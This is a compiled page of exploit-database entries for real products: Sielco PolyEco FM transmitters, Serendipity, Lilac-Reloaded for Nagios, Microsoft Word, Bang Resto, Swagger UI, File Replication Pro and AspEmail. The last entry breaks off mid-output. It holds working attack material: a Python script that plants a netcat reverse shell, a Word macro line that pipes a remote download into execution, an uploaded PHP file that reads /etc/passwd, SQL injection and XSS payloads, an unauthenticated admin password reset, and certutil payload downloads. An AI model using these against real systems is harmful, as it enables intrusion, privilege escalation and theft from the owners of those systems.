ISHACK AI BOT

## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5768 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php 26.01.2023 -- index.htm: ---------- 54: function dologin() { 55: var hash = hex_md5($('#password').val() + id); 56: $.get('/login.cgi', { 57: user: $('#user').val(), 58: password: hash, 59: id: id 60: }).done(function (data) { 61: var dati = $.parseXML(data); 62: id = $(dati).find('id').text(); 63: user = $(dati).find('u').text(); 64: if (id == 0) 65: window.location.href = '/index.htm'; 66: else { 67: scriviCookie('polyeco', id, 180); 68: if (user >= 3) 69: window.location.href = '/protect/factory.htm'; 70: else 71: window.location.href = '/protect/index.htm'; 72: } 73: }); 74: } The function 'dologin()' in index.htm is called when a user submits a login form. It starts by calculating a hash of the user-entered password and a variable 'id' using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi' endpoint with the user's entered username, the calculated password hash and the 'id' variable as parameters. If the request is successful, the function parses the XML data returned from the server, extracting the values of the 'id' and 'u' elements. Then it checks the value of the 'id' variable, if it's equal to 0 then it redirects the user to '/index.htm', otherwise, it writes a cookie called 'polyeco' with the value of 'id' and expires after 180 days. After that it checks the value of the 'user' variable, if it's greater than or equal to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the user to '/protect/index.htm'. An attacker can exploit this by modifying the client-side JavaScript to always set the 'user' variable to a high value (4), or by tampering with the data sent to the server during the login process to change the value of the 'user' variable. It also works if the server's response variable 'user' is modified.

## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions and manipulate the RDS text display. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5767 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php 26.01.2023 -- POST /protect/rds.htm HTTP/1.1 Host: RADIOFM rds_inta=1 rds_intb=0 rds_pi=381 rds_ps=ZSL rds_rta=www.zeroscience.mk rds_rtb rds_rtt=0 rds_tp=0 rds_tp=1 rds_ta=0 rds_ms=0 rds_pty=4 rds_ptyn= rds_ecc=00 rds_ct=0 rds_level=90 rds_psd=0 rds_psd1 rds_pst1=0 rds_psd5 rds_pst5=0 rds_psd2 rds_pst2=0 rds_psd6 rds_pst6=0 rds_psd3 rds_pst3=0 rds_psd7 rds_pst7=0 rds_psd4 rds_pst4=0 rds_psd8 rds_pst8=0 rds_di_pty=0 rds_di_cmp=0 rds_di_cmp=1 rds_di_st=0 rds_di_art=0 rds_di_art=1 a0=90 a1=9 a2=26 a3=115 a4=0 a5=0 a6=0 a7=0 a8=0 a9=0 a10=0 a11=0 a12=0 a13=0 a14=0 a15=0 a16=0 a17=0 a18=0 a19=0 a20=0 a21=0 a22=0 a23=0 a24=0

## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: Sielco PolyEco is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5766 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php 26.01.2023 -- $ curl -s http://RADIOFM/factory.ssi $ curl -s http://RADIOFM/rds.ssi $ curl -s http://RADIOFM/ip.ssi $ curl -s http://RADIOFM/alarm.ssi $ curl -s http://RADIOFM/i2s.ssi $ curl -s http://RADIOFM/time.ssi $ curl -s http://RADIOFM/fft.ssi $ curl -s http://RADIOFM/info.ssi $ curl -s http://RADIOFM/status.ssi $ curl -s http://RADIOFM/statusx.ssi $ curl -s http://RADIOFM/audio.ssi $ curl -s http://RADIOFM/smtp.ssi $ curl -s http://RADIOFM/rf.ssi $ curl -s http://RADIOFM/rfa.ssi $ curl -s http://RADIOFM/ping.ssi $ curl -s http://RADIOFM/lan.ssi $ curl -s http://RADIOFM/kappa.ssi $ curl -s http://RADIOFM/dbrt.ssi $ curl -s http://RADIOFM/audiom.ssi $ curl -s http://RADIOFM/log.ssi

## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: The application suffers from an authentication bypass, account takeover/lockout and elevation of privileges vulnerability that can be triggered by directly calling the users object and effectively modifying the password of the two constants user/role (user/admin). This can be exploited by an unauthenticated adversary by issuing a single POST request to the vulnerable endpoint and gain unauthorized access to the affected device with administrative privileges. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5765 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php 26.01.2023 -- # Change admin pwd $ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm

Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS) Author: Mirabbas Ağalarov Application: Serendipity Version: 2.4.0 Bugs: Stored XSS Technology: PHP Vendor URL: https://docs.s9y.org/ Software Link: https://docs.s9y.org/downloads.html Date of found: 13.04.2023 Tested on: Linux 2. Technical Details & POC ======================================== steps: 1.Anyone who has the authority to create the new entry can do this payload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E POST /serendipity/serendipity_admin.php? HTTP/1.1 Host: localhost Content-Length: 730 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b Connection: close serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1 2. visit the entry you created

#!/usr/bin/env python """ # Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 2023-04-13 # Exploit Author: max / Zoltan Padanyi # Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit # Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download # Version: 2.0.8 # Tested on: Debian 7.6 # CVE : N/A The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ; Use at your own risk! RCA - wild exec is ongoing without any filtering in library/Net/Traceroute.php 181 function _setTraceroutePath($sysname) 182 { 183 $status = ''; 184 $output = array(); 185 $traceroute_path = ''; 186 187 if ("windows" == $sysname) { 188 return "tracert"; 189 } else { 190 $traceroute_path = exec("which traceroute", $output, $status); [...] 257 function traceroute($host) 258 { 259 260 $argList = $this->_createArgList(); 261 $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1]; 262 exec($cmd, $this->_result); """ import requests import argparse parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True) parser.add_argument("-i", "--ip", help="Listener IP", required=True) parser.add_argument("-p", "--port", help="Listener port", required=True, type=int) args = parser.parse_args() rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;" body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"} try: r = requests.get(args.url) if r.ok: print("[+] URL looks good...moving forward...") print("[+] Sending exploit in...") r = requests.post(args.url,data=body) if r.ok: print("[+] Got HTTP 200, check your listener!") else: print("[-] Some kind of error happened, check the http response below!") print(r.text) except Exception as e: print("General exception: " + str(e))

Exploit Title: Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated) Application: Serendipity Version: 2.4.0 Bugs: Remote Code Execution (RCE) (Authenticated) via file upload Technology: PHP Vendor URL: https://docs.s9y.org/ Software Link: https://docs.s9y.org/downloads.html Date of found: 13.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== If we load the poc.phar file in the image field while creating a category, we can run commands on the system. <?php echo system("cat /etc/passwd"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it. Visit to http://localhost/serendipity/uploads/poc.phar poc request: POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1 Host: localhost Content-Length: 1561 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b Connection: close ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[token]" ae9b8ae35a756c24f9552a021ee81d56 ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[action]" admin ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[adminModule]" media ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[adminAction]" add ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar" Content-Type: application/octet-stream <?php echo system("cat /etc/passwd");?> ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[target_filename][1]" poc.phar ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[target_directory][1]" ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[column_count][1]" true ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[imageurl]" ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[imageimporttype]" image ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[target_filename][]" ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[target_directory][]" ------WebKitFormBoundaryZWKPiba66PSVGQzc-- poc video : https://youtu.be/_VrrKOTywgo

# Exploit Title: File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control # Date: 2023-04-13 # Exploit Author: Andrea Intilangelo # Vendor Homepage: http://www.diasoft.net - https://www.filereplicationpro.com # Software Link: http://www.filereplicationpro.com/install/InstData/Windows_64_Bit/VM/frpro.exe # Version: 7.5.0 # Tested on: Windows 10 Pro 22H2 x64 # CVE: CVE-2023-26918 Incorrect file/folder permissions in Diasoft Corporation's File Replication Pro 7.5.0 allow privilege escalation by replacing a file with another one that will be executed with "LocalSystem" rights from Windows Services application. C:\Program Files>icacls "c:\Program Files\FileReplicationPro" c:\Program Files\FileReplicationPro Everyone:(F) Everyone:(OI)(CI)(IO)(F) C:\Users\Administrator>sc qc frp [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: frp TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : "C:\Program Files\FileReplicationPro\prunsrv.exe" //RS//frp GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : FRPReplicationServer DIPENDENZE : Tcpip : Afd SERVICE_START_NAME : LocalSystem To exploit the vulnerability a malicious actor/process must weaponize or replace the prunsrv.exe executable that runs with LocalSystem privileges as "frp" (FRPReplicationServer) service, since the application's path has "Everyone" full access permissions. Moreover, the "properties.xml" file in the "etc" folder inside program's path contains the hashed password for remote access stored in sha1(base64) value, that is possible to modify. Replacing it with a new hash, generated by encrypting a string in SHA-1 and encoding its digest via base64, will grant the login access on the application's web interface.

## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 04.14.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3 ## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ ## CVE-ID: CVE-2023-28311 ## Description: The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim's computer. The attacker can trick the victim to open a malicious web page by using a `Word` malicious file and he can steal credentials, bank accounts information, sniffing and tracking all the traffic of the victim without stopping - it depends on the scenario and etc. STATUS: HIGH Vulnerability [+]Exploit: The exploit server must be BROADCASTING at the moment when the victim hit the button of the exploit! ```vbs Call Shell("cmd.exe /S /c" & "curl -s http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus) ``` ## Reproduce: [href]( https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311) ## Reference: [href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311) [href]( https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/) ## Proof and Exploit [href](https://streamable.com/s60x3k) ## Time spend: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS) # Date: 2023-04-02 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html # Software Link: https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip # Version: 1.0 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-29848 *Steps to Reproduce:* 1. First login to your admin panel. 2. then go to Menu section and click add new menu from group. your request data will be: POST /bangresto/admin/menu.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 87 Origin: http://127.0.0.1 Referer: http://127.0.0.1/bangresto/admin/menu.php Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6 Connection: close itemName=test&itemPrice=1&menuID=1&addItem= 3. Then use any XSS Payload in "itemName" parameter and click add. 4. You will see XSS pop up.

# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection # Date: 2023-04-02 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html # Software Link: https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip # Version: 1.0 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-29849 *Affected Parameters:* btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[], itemqty[], btnMenuItemID *Steps to Reproduce:* 1. First login your staff panel. 2. then go to "order" menu and Select menu then create order and intercept request data using burp suite. so your request data will be: POST /bangresto/staff/displayitem.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 194 Origin: http://127.0.0.1 Referer: http://127.0.0.1/bangresto/staff/order.php Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5 Connection: close btnMenuItemID=1&qty=1 3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based SQL Injection use this query ".1 union select 1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())-- -" in "btnMenuItemID" parameter. 4. Check browser you will see user, database and version informations. 5. You could also use sqlmap to dump the whole database by saving the web request from BurpSuite

# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information # Date: 14 April, 2023 # Exploit Author: Rafael Cintra Lopes # Vendor Homepage: https://swagger.io/ # Version: < 4.1.3 # CVE: CVE-2018-25031 # Site: https://rafaelcintralopes.com.br/ # Usage: python swagger-exploit.py https://[swagger-page].com from selenium import webdriver from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from selenium.webdriver.chrome.service import Service import time import json import sys if __name__ == "__main__": target = sys.argv[1] desired_capabilities = DesiredCapabilities.CHROME desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"} options = webdriver.ChromeOptions() options.add_argument("--headless") options.add_argument("--ignore-certificate-errors") options.add_argument("--log-level=3") options.add_experimental_option("excludeSwitches", ["enable-logging"]) # Browser webdriver path drive_service = Service("C:/chromedriver.exe") driver = webdriver.Chrome(service=drive_service, options=options, desired_capabilities=desired_capabilities) driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json") time.sleep(10) driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json") time.sleep(10) logs = driver.get_log("performance") with open("log_file.json", "w", encoding="utf-8") as f: f.write("[") for log in logs: log_file = json.loads(log["message"])["message"] if("Network.response" in log_file["method"] or "Network.request" in log_file["method"] or "Network.webSocket" in log_file["method"]): f.write(json.dumps(log_file)+",") f.write("{}]") driver.quit() json_file_path = "log_file.json" with open(json_file_path, "r", encoding="utf-8") as f: logs = json.loads(f.read()) for log in logs: try: url = log["params"]["request"]["url"] if(url == "https://petstore.swagger.io/v2/hacked1.json"): print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json") if(url == "https://petstore.swagger.io/v2/hacked2.json"): print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json") except Exception as e: pass

#################################################################################################################### # Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation # # Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] # # Date: 13/04/2023 # # Exploit Author: Zer0FauLT [[email protected]] # # Vendor Homepage: https://www.aspemail.com # # Software Link: https://www.aspemail.com/download.html # # Product: AspEmail # # Version: AspEmail 5.6.0.2 and all # # Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU # # Tested on: Windows Server 2016 and Windows Server 2019 # # CVE : 0DAY # #################################################################################################################### # ================================================================================================================== [+] C:\PenTest>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled # ================================================================================================================== * First, we will test whether the AspEmail service is active. * First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running: [+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe EmailAgent.exe 4400 Persits Software EmailAgent or [+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe EmailAgent64.exe 4400 Persits Software EmailAgent * We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". * Now we know that AspEmail service is active. # ================================================================================================================== * We will need these: [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1" # ================================================================================================================== [+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" Name: Persits Software EmailAgent ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email Agent.exe" /run User : LocalSystem ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN IdentityReference : Everyone Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, ReadExtendedAttributes, DeleteChild, Execute/Traverse Status : Unknown UserCanStart : 